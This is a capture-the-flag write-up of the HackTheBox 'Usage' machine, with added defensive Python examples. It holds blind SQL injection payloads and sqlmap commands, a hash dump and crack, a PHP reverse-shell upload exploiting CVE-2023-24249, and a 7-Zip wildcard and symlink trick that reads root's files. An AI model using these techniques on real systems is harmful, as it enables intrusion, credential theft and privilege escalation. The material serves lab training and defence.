Hackthebox: Usage

Foued SAIDI

Overview

Usage is an easy-difficulty HackTheBox machine. A SQL injection in the password-reset form of a Laravel blog gives us the admin's bcrypt hash; cracking it gets us into the admin dashboard, where a file upload flaw in encore/laravel-admin v1.8.18 (CVE-2023-24249) lands a shell as dash. From there a password left in .monitrc pivots to xander, and a sudo-allowed backup tool that runs 7z over a shell wildcard gives up the root flag.

Usage-info-card

Reconnaissance

Nmap

Nmap scan report for 10.129.88.136
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a0f8fdd304b807a063dd37dfd7eeca78 (ECDSA)
|_ 256 bd22f5287727fb65baf6fd2f10c7828f (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=8/10%OT=22%CT=1%CU=31655%PV=Y%DS=2%DC=T%G=Y%TM=66B734A
OS:B%P=i686-pc-windows-windows)SEQ(SP=103%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(CI=Z%II=I)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54E
OS:ST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W
OS:5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y
OS:%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%
OS:T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE
OS:(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 306.00 ms 10.10.16.1
2 130.00 ms 10.129.88.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.92 seconds

Only two ports are open: OpenSSH on 22 and nginx on 80, which redirects to the virtual host usage.htb.
So we add the entry to our /etc/hosts file: 10.129.88.136 usage.htb

Web Application - http://usage.htb

Web App Port 80

The site is a blog with login and registration features. We register an account and log in with it:

User login

We also notice an Admin button that redirects to the admin.usage.htb subdomain.

We add that as an entry to our /etc/hosts file and we navigate to it:

Admin subdomain

SQL Injection - http://usage.htb

With nothing else of interest on the main domain, the next step is to probe its inputs for SQL injection. The obvious entry points are the login form and the forgot-password form:

Password Reset

So I just went forward and intercepted the request using Caido:

POST /forget-password HTTP/1.1
Host: usage.htb
Content-Length: 69
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://usage.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-GPC: 1
Accept-Language: en-GB,en;q=0.6
Referer: http://usage.htb/forget-password
Accept-Encoding: gzip, deflate
Cookie: XSRF-TOKEN=eyJpdiI6Ik5Md25oSUFWeFM2eEdBWDhRTGdXaXc9PSIsInZhbHVlIjoiUVBneFFtWHhDTGlnbjk0b1F0QkVTbmpUdGVEUXc1eklsc3E4dTN2Q0FaSUE3YUg5ZzA0bW53UE1HenBjVUFFQmgzSWZOSkxvd3NtcDhFaURpTXIyNHNUeFN2WDN3UHoyUFBQeEZrN3BKekQyN0tnRmpTbXAvMkN0WWxpUkRRSUkiLCJtYWMiOiJmYWZmMmFjNDdiNjc5MjEyYTA4NjkwYjdkZDczYzg0YjA2YWQ5MzVmZWVkMjhkNDNkODBiNWRmMjg0ZmM1YTQwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlBhOVR1bUJIbVpwZUFoa1BVdkx2dFE9PSIsInZhbHVlIjoiT0ZLSGhHNkRTM3owMjY3RE5mbWF4anU1KzUzYUhwLzFKOE1jYnIwSHpBVWkrQUFhQjFVYXBjZkpWMTdkejFwQUhYQllOaGx3OHFIb2xsRG1XaHdBMlBsL0V6SEdVYWFPQXoxbWpNTDFld3Z3R2YwOFdFczJsb0pweU14ZE5hZDEiLCJtYWMiOiJiNWRhZGNhNzVjZTdlY2NjMDdmZTA1NTBlMTRlMDkxZDM4NDdhYjFlNTgwNTIzNGQxZjVjMjBkZTM4NzUyNTk3IiwidGFnIjoiIn0%3D

_token=DGA8A7rtMhyX8BC5kUKoiO1bn00gMumga5ZKJAlx&email=kujen%40htb.htb

Injecting a single quote into the email field produces a 500 Internal Server Error, a strong hint that the value reaches the database query unescaped:

Password Reset

SQL Injection Exploitation - SQLMap

I save the intercepted password-reset request to request.txt and hand it to sqlmap, restricting the test to the email parameter. It is vulnerable:

┌──(kali㉿kali)-[~/hackthebox/usage]
└─$ sqlmap -r request.txt -p email --level 5 --risk 3 --batch --threads 10 --dbs
<snip>
POST parameter 'email' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 739 HTTP(s) requests:
---
Parameter: email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: _token=DGA8A7rtMhyX8BC5kUKoiO1bn00gMumga5ZKJAlx&email=kujen@htb.htb' AND 5430=(SELECT (CASE WHEN (5430=5430) THEN 5430 ELSE (SELECT 8123 UNION SELECT 5977) END))-- fWmg

Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: _token=DGA8A7rtMhyX8BC5kUKoiO1bn00gMumga5ZKJAlx&email=kujen@htb.htb' AND 6527=BENCHMARK(5000000,MD5(0x7a546b67))-- YvmE
---
[07:08:23] [INFO] the back-end DBMS is MySQL
<snip>
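
To make the oracle sqlmap is driving concrete, here is an added example (not code from this writeup or from the Usage box) that rebuilds the situation offline: SQLite stands in for MySQL, the `users` and `admin_users` tables mirror the usage_blog schema, and `forget_password_vulnerable` is a hypothetical handler that concatenates the email into its query. The extraction recovers the admin hash one character at a time from nothing but the true/false answer the endpoint gives, and the parameterised `forget_password_fixed` shows the same payloads doing nothing. Registering `kujen@htb.htb` first matters: the injected `AND` can only ever be true when the left-hand side matches a real row.

```python
"""Boolean-based blind extraction through a forget-password handler.

Added example: SQLite stands in for MySQL, the two tables mirror the
usage_blog schema (users, admin_users), and the handler functions are
hypothetical stand-ins, not the application's code."""
import sqlite3

# Constructed seed data: the account we registered and the admin row
# whose bcrypt hash the injection recovers.
ATTACKER_EMAIL = "kujen@htb.htb"
ADMIN_HASH = "$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2"


def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT NOT NULL);
        CREATE TABLE admin_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        """
    )
    con.execute("INSERT INTO users (email) VALUES (?)", (ATTACKER_EMAIL,))
    con.execute("INSERT INTO admin_users (username, password) VALUES (?, ?)",
                ("admin", ADMIN_HASH))
    return con


def forget_password_vulnerable(con, email):
    """Hypothetical vulnerable handler: the email is concatenated into SQL.
    True stands for 'reset link sent', False for 'no such user'. That
    two-way answer is the oracle; the 500 on a stray quote is just a bonus."""
    row = con.execute(f"SELECT id FROM users WHERE email = '{email}'").fetchone()
    return row is not None


def forget_password_fixed(con, email):
    """Same lookup with a bound parameter: the payload is matched literally."""
    row = con.execute("SELECT id FROM users WHERE email = ?", (email,)).fetchone()
    return row is not None


def oracle(con, handler, condition):
    # The AND needs a true left-hand side, so the registered address goes first.
    payload = f"{ATTACKER_EMAIL}' AND ({condition})-- "
    return handler(con, payload)


def extract(con, handler, subquery, max_len=80):
    """Recover the string returned by `subquery` one byte at a time with a
    binary search over its code point (SQLite unicode(); MySQL uses ASCII()).
    Past the end substr() yields '' and the comparison is never true, so the
    search bottoms out at 0 and we stop."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(con, handler, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = build_db()
    target = "SELECT password FROM admin_users WHERE username = 'admin'"
    print("vulnerable:", extract(db, forget_password_vulnerable, target))
    print("fixed     :", repr(extract(db, forget_password_fixed, target)))
```

Each character costs seven requests with this binary search, which is why sqlmap's run above took several hundred HTTP requests for a handful of database names; the hardened handler returns the empty string because no injected condition can make a bound parameter match a row.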

MySQL Exploitation

[07:08:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL < 5.0.12
[07:08:26] [INFO] fetching database names
[07:08:26] [INFO] fetching number of databases
[07:08:26] [INFO] retrieved: 3
[07:08:30] [INFO] retrieving the length of query output
[07:08:30] [INFO] retrieved: 18
[07:08:48] [INFO] retrieved: information_schema
[07:08:48] [INFO] retrieving the length of query output
[07:08:48] [INFO] retrieved: 18
[07:09:04] [INFO] retrieved: performance_schema
[07:09:04] [INFO] retrieving the length of query output
[07:09:04] [INFO] retrieved: 10
[07:09:20] [INFO] retrieved: usage_blog
available databases [3]:
[*] information_schema
[*] performance_schema
[*] usage_blog

The "MySQL < 5.0.12" version string is taken from the heavy-query BENCHMARK() payload that worked, not from a server banner, so treat it as a label for the technique rather than the real server version. We can now enumerate the usage_blog database with SQLMap:

┌──(kali㉿kali)-[~/hackthebox/usage]
└─$ sqlmap -r request.txt -p email --level 5 --risk 3 --batch --threads 10 -D usage_blog --tables

The tables belong to the Laravel blog and to its laravel-admin panel (the admin_* tables):

Database: usage_blog
[15 tables]
+------------------------+
| admin_menu |
| admin_operation_log |
| admin_permissions |
| admin_role_menu |
| admin_role_permissions |
| admin_role_users |
| admin_roles |
| admin_user_permissions |
| admin_users |
| blog |
| failed_jobs |
| migrations |
| password_reset_tokens |
| personal_access_tokens |
| users |
+------------------------+

We dump the username and password hash from the admin_users table:

┌──(kali㉿kali)-[~/hackthebox/usage]
└─$ sqlmap -r request.txt -p email --level 5 --risk 3 --batch --threads 10 -D usage_blog -T admin_users -C username,password --dump
<snip>
Database: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+
<snip>

The hash is bcrypt with cost factor 10 (john reports the iteration count as 1024, that is 2^10). It cracks against rockyou.txt in seconds:

┌──(kali㉿kali)-[~/hackthebox/usage]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
whatever1 (?)
1g 0:00:00:07 DONE (2024-08-10 07:22) 0.1319g/s 213.7p/s 213.7c/s 213.7C/s alexis1..serena
Use the "--show" option to display all of the cracked passwords reliably
Session completed

We can now login into the admin dashboard:

Admin Dashboard

CVE-2023-24249

The dashboard lists the dependencies used by the web application, among them encore/laravel-admin v1.8.18. Searching for known issues in that version turns up CVE-2023-24249, an arbitrary file upload through the avatar field of the admin settings page:
https://www.cvedetails.com/cve/CVE-2023-24249

The upload form only accepts image files, but that restriction does not survive a proxy. We take a PHP reverse shell, save it as pwn.php.jpg so the form accepts it, intercept the resulting PUT to /admin/auth/setting and rename the part to pwn.php.jpg.php. The server keeps the name as submitted, and the trailing .php is what the web server executes:

POST /admin/auth/setting HTTP/1.1
Host: admin.usage.htb
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-PJAX: true
X-PJAX-Container: #pjax-container
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuz2YtHsN2jWvAETB
Sec-GPC: 1
Accept-Language: en-GB,en;q=0.6
Origin: http://admin.usage.htb
Referer: http://admin.usage.htb/admin/auth/setting
Accept-Encoding: gzip, deflate
Cookie: remember_admin_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IjlNNHhoTGc0WUpRY3pqSE9iZWdOYkE9PSIsInZhbHVlIjoiRXRpU2xlaEE2dE42Qkk0VEFOblN0cFU1R1JFa2R5b1RVbEtVenVHdHFNL0Z3RE84ci9hOHFTM2RYVzdIYmU5SVp3d1cwVUVVUzNrZXBEazBCdTl3Q00vRzdqeW15bnNEeTZCMnVaaWwyWmJXdVREODN6dnNhNGMrZWd3dHJ5UlkvTVhWc1RoelcxUlFNQ0ZrQTZVRGsxSm5NaHlBaGUrb3cvdFR1OHNDZTFVcFUwbEVoUFF3NVRsbGFoYzA5VUlYMjRyRUV6dFc1UVRkVFVoZjNkTXFXVlhTZmdvK1RrdGhjc3VQSFE4ek45Yz0iLCJtYWMiOiJkOTFkMTEzOWNmMDIwYmY0MGZhMjFiNzZhOGEwMzFlMmVhNDM4N2NhMTlkYjNkOWFjYzg4ZjlmN2I3OTA5NDMxIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6InJmSmVUcGFqSkprcDBWdVo1SUhHaEE9PSIsInZhbHVlIjoiSzZtWCtCOWwwSDQ2Q09UZ00zQ0xiT0FaQnJpeGxQcWduOWlUa1d5akMwaE9qYXZVVjJjQ052d3ByWXlWSExOR3lubFphTmNXNTdNb0hyYzQrMDhDS2NCek9qOGVPenJkR2hPcWQxRWg2NkpwbjAxVGl0ZVdESVczR1ZVckdFK0IiLCJtYWMiOiI2OGNkMmQyMGFlNjI3NjIzNWFhMGZkMjQzZjAxMTk1NGFkOTU2Y2MyZDViZmRlMWZmNjM1YzAxZDcyZTk2ZjVjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImNFSm1RV016ZzlOQ09NK2ZlZFY2Q0E9PSIsInZhbHVlIjoiYmR2c25NYktILzh6Mm5YK0tsRmdnOHI4UUl6SWZHQkg3Qjc3QUxBUlEwQ1Q3VEJ0Z1BkT1lKekdDR3ZzVHMrcjJqTTJXWUVXSUt0NCtES3E1bmJOb2ErdVluRm1Sc3g2dExFM1liaTJaN3BFS25hdXh4S0VZejJqN3BSOVpSZFIiLCJtYWMiOiJlNmEyZGJhMTQ3NDM3OTYxZmY1YjgxMmJkODBkMWVkZGI3ZTBkYTljMzQ4MjMwNjVhMWQ4NWI0Y2IwZTlhNTkxIiwidGFnIjoiIn0%3D
Content-Length: 6014

------WebKitFormBoundaryuz2YtHsN2jWvAETB
Content-Disposition: form-data; name="name"

Administrator
------WebKitFormBoundaryuz2YtHsN2jWvAETB
Content-Disposition: form-data; name="avatar"; filename="pwn.php.jpg.php"
Content-Type: image/jpeg

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
<snip>




------WebKitFormBoundaryuz2YtHsN2jWvAETB
Content-Disposition: form-data; name="_token"

T8a0DDopYjOldX8ts4OL44lDC2A1ha1GCUS4z7dq
------WebKitFormBoundaryuz2YtHsN2jWvAETB
Content-Disposition: form-data; name="_method"

PUT
------WebKitFormBoundaryuz2YtHsN2jWvAETB--

And we get our reverse shell:

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.88.136] 38682
Linux usage 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
11:49:57 up 2:17, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(dash) gid=1000(dash) groups=1000(dash)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(dash) gid=1000(dash) groups=1000(dash)

And we get our user flag:

$ cat /home/dash/user.txt
ebb49d21c12cb5******************
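
The kind of check the renamed upload defeats, next to a hardened one, as an added illustration (a Python stand-in, not laravel-admin's code; `accept_weak`, `store_hardened` and the rules they implement are assumptions for the example). The weak rule accepts anything whose Content-Type claims to be an image or whose name contains an image extension anywhere, so `pwn.php.jpg.php` with `Content-Type: image/jpeg` passes exactly as in the intercepted request. The hardened version looks only at the final suffix, checks the file signature against it, and stores the file under a random server-chosen name.

```python
"""Avatar upload validation: a check a doubled extension slips past, next to
a hardened version.

Added illustration, not laravel-admin's code. The weak rule is a plausible
stand-in for a filter that accepts 'pwn.php.jpg.php'; function names and
behaviour are assumptions for the example."""
import os
import secrets
import tempfile

IMAGE_EXTENSIONS = {".jpg", ".png", ".gif"}

# Leading bytes of the formats we allow. The stored extension is derived
# from the bytes, never from the client-supplied name.
MAGIC = (
    (b"\xff\xd8\xff", ".jpg"),
    (b"\x89PNG\r\n\x1a\n", ".png"),
    (b"GIF87a", ".gif"),
    (b"GIF89a", ".gif"),
)


def accept_weak(filename, content_type):
    """Weak: believes the client's Content-Type header and is satisfied by an
    image extension anywhere in the name. 'pwn.php.jpg.php' sent as
    'image/jpeg' passes both tests, and the web server runs the final .php."""
    name = filename.lower()
    return content_type.startswith("image/") or any(ext in name for ext in IMAGE_EXTENSIONS)


def sniff_image(data):
    """Return the extension matching the file signature, or None."""
    for magic, ext in MAGIC:
        if data.startswith(magic):
            return ext
    return None


def store_hardened(upload_dir, filename, data):
    """Hardened: only the final suffix counts, it must be allow-listed, the
    bytes must carry the matching signature, and the file is written under a
    random name so the client controls neither the path nor the extension of
    what is later served. Returns the stored name."""
    _, ext = os.path.splitext(filename.lower())
    if ext == ".jpeg":
        ext = ".jpg"
    if ext not in IMAGE_EXTENSIONS:
        raise ValueError(f"extension not allowed: {ext!r}")
    if sniff_image(data) != ext:
        raise ValueError("file content does not match its extension")
    stored = secrets.token_hex(16) + ext
    with open(os.path.join(upload_dir, stored), "wb") as fh:
        fh.write(data)
    return stored


def run_demo():
    """Try three constructed uploads against store_hardened in a temp dir;
    map each original name to the stored name, or None when rejected."""
    php = b"<?php system($_GET['c']); ?>"       # constructed webshell stand-in
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16   # constructed JPEG header
    upload_dir = tempfile.mkdtemp()
    results = {}
    for name, data in (("pwn.php.jpg.php", php), ("pwn.php.jpg", php), ("avatar.JPG", jpeg)):
        try:
            results[name] = store_hardened(upload_dir, name, data)
        except ValueError:
            results[name] = None
    return results


if __name__ == "__main__":
    print("weak accepts pwn.php.jpg.php:", accept_weak("pwn.php.jpg.php", "image/jpeg"))
    for name, stored in run_demo().items():
        print(name, "->", stored or "rejected")
```

Note that `pwn.php.jpg` is rejected too: its suffix is allowed, but the bytes are not a JPEG. Serving uploads from a location where the web server never executes scripts is the other half of the fix, and is independent of anything the upload handler checks.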

Privilege Escalation to root

Pivoting from dash to xander

Looking through dash's home directory, we find a hidden .monitrc file with a cleartext password for the monit web interface. The same password is reused by the xander account, so we can switch to it:

dash@usage:~$ cat .monitrc
#Monitoring Interval in Seconds
set daemon 60

#Enable Web Access
set httpd port 2812
use address 127.0.0.1
allow admin:3nc0d3d_pa$$w0rd

#Apache
check process apache with pidfile "/var/run/apache2/apache2.pid"
if cpu > 80% for 2 cycles then alert


#System Monitoring
check system usage
if memory usage > 80% for 2 cycles then alert
if cpu usage (user) > 70% for 2 cycles then alert
if cpu usage (system) > 30% then alert
if cpu usage (wait) > 20% then alert
if loadavg (1min) > 6 for 2 cycles then alert
if loadavg (5min) > 4 for 2 cycles then alert
if swap usage > 5% then alert

check filesystem rootfs with path /
if space usage > 80% then alert
dash@usage:~$

Xander to root

Checking what xander can run as sudo we find something interesting:

xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User xander may run the following commands on usage:
(ALL : ALL) NOPASSWD: /usr/bin/usage_management
xander@usage:~$

Running strings on /usr/bin/usage_management reveals the command behind the backup option:

/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *

This matches what we see when we run the binary and choose option 1:

xander@usage:~$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7763 64-Core Processor (A00F11),ASM,AES-NI)

Scanning the drive:
2984 folders, 17946 files, 113879190 bytes (109 MiB)

Creating archive: /var/backups/project.zip

Items to compress: 20930


Files read from disk: 17946
Archive size: 54830173 bytes (53 MiB)
Everything is Ok

Doing some research, I find this interesting article from https://book.hacktricks.xyz/: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks

The backup is taken from a directory we can write to, and the shell expands `*` into whatever names it finds there. Two files turn that into an arbitrary file read: an empty file named @root.txt, which 7-Zip interprets as a list file rather than a file to archive, and root.txt as a symlink to the file we want to read. 7-Zip follows the symlink, reads /root/root.txt as the list, tries to add a file named after each line, cannot find it, and echoes the line back in its "No more files" warning. That is how the flag ends up in the output:

xander@usage:/var/www/html$ touch @root.txt
xander@usage:/var/www/html$ ln -s /root/root.txt root.txt
xander@usage:/var/www/html$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7763 64-Core Processor (A00F11),ASM,AES-NI)

Open archive: /var/backups/project.zip
--
Path = /var/backups/project.zip
Type = zip
Physical Size = 54830315

Scanning the drive:

WARNING: No more files
877179f45367f9******************

2984 folders, 17947 files, 113879223 bytes (109 MiB)

Updating archive: /var/backups/project.zip

Items to compress: 20931


Files read from disk: 17947
Archive size: 54830315 bytes (53 MiB)

Scan WARNINGS for files and folders:

877179f45367f9****************** : No more files
----------------
Scan WARNINGS: 1
xander@usage:/var/www/html$

And the root flag is 877179f45367f9******************
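
The mechanics behind that output, as an added example (Python; not the writeup's or the box's code, 7-Zip is modelled rather than executed, and every path is constructed): the shell expands `*` to every non-hidden name in the working directory, 7-Zip treats an argument beginning with `@` as a list file holding one path per line, and opening that list follows the symlink. The `--` in the real command stops switch parsing, yet as the output above shows it does not stop list-file expansion, and `-snl` stores symlinks as links rather than following them, so the leak comes through the list file and not through the archive. `audit_backup_dir` is the pre-flight check a maintainer of usage_management could run before globbing in a user-writable directory; the function names are assumptions.

```python
"""What '7za a archive -- *' does when the caller controls the working
directory, and a pre-flight check for it.

Added example: the directory layout is constructed, 7-Zip's list-file
handling is mirrored in Python rather than invoked, and the function
names are assumptions."""
import glob
import os
import tempfile


def wildcard_arguments(directory):
    """The arguments the shell hands to 7za for '*': sorted, dotfiles excluded."""
    return sorted(os.path.basename(p) for p in glob.glob(os.path.join(directory, "*")))


def listfile_entries(directory, argument):
    """Mirror how 7-Zip expands an '@name' argument: open 'name' relative to
    the working directory (following symlinks) and return each line as a path
    to archive. Lines that name no existing file are what 7za echoes back in
    its 'No more files' warning, so the file's contents leak by name."""
    if not argument.startswith("@"):
        return []
    with open(os.path.join(directory, argument[1:]), encoding="utf-8") as fh:
        return [line.rstrip("\n") for line in fh if line.strip()]


def audit_backup_dir(directory):
    """Pre-flight check for a wildcard backup: report the names that change
    7-Zip's behaviour instead of being archived as plain files."""
    findings = []
    for name in wildcard_arguments(directory):
        full = os.path.join(directory, name)
        if name.startswith("@"):
            findings.append((name, "list file"))
        if name.startswith("-"):
            findings.append((name, "switch"))
        if os.path.islink(full):
            findings.append((name, "symlink -> " + os.readlink(full)))
    return findings


def build_scenario():
    """Constructed stand-in for /var/www/html. The secret lives outside the
    backed-up directory, as /root/root.txt does on the box."""
    outside = tempfile.mkdtemp()
    secret = os.path.join(outside, "root.txt")
    with open(secret, "w", encoding="utf-8") as fh:
        fh.write("CONSTRUCTED_FLAG_VALUE\n")
    work = tempfile.mkdtemp()
    open(os.path.join(work, "index.php"), "w").close()   # an ordinary project file
    open(os.path.join(work, "@root.txt"), "w").close()   # becomes '@root.txt' in the glob
    os.symlink(secret, os.path.join(work, "root.txt"))   # what the list file resolves to
    return work


if __name__ == "__main__":
    d = build_scenario()
    print("glob expands to:", wildcard_arguments(d))
    print("list file read through symlink:", listfile_entries(d, "@root.txt"))
    for finding in audit_backup_dir(d):
        print("WARN", *finding)
```

The audit flags both halves of the trick, the `@`-prefixed name and the symlink, before anything is archived. The more robust fix is to stop letting the shell enumerate a user-writable directory at all, for example by feeding 7-Zip an explicit path list generated by the privileged tool itself.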

Thank you for reading! Hope you enjoyed it.
-0xkujen

  • Title: Hackthebox: Usage
  • Author: Foued SAIDI
  • Created at : 2024-08-10 13:08:20
  • Updated at : 2024-08-10 17:10:32
  • Link: https://kujen5.github.io/2024/08/10/Hackthebox-Usage/
  • License: This work is licensed under CC BY-NC-SA 4.0.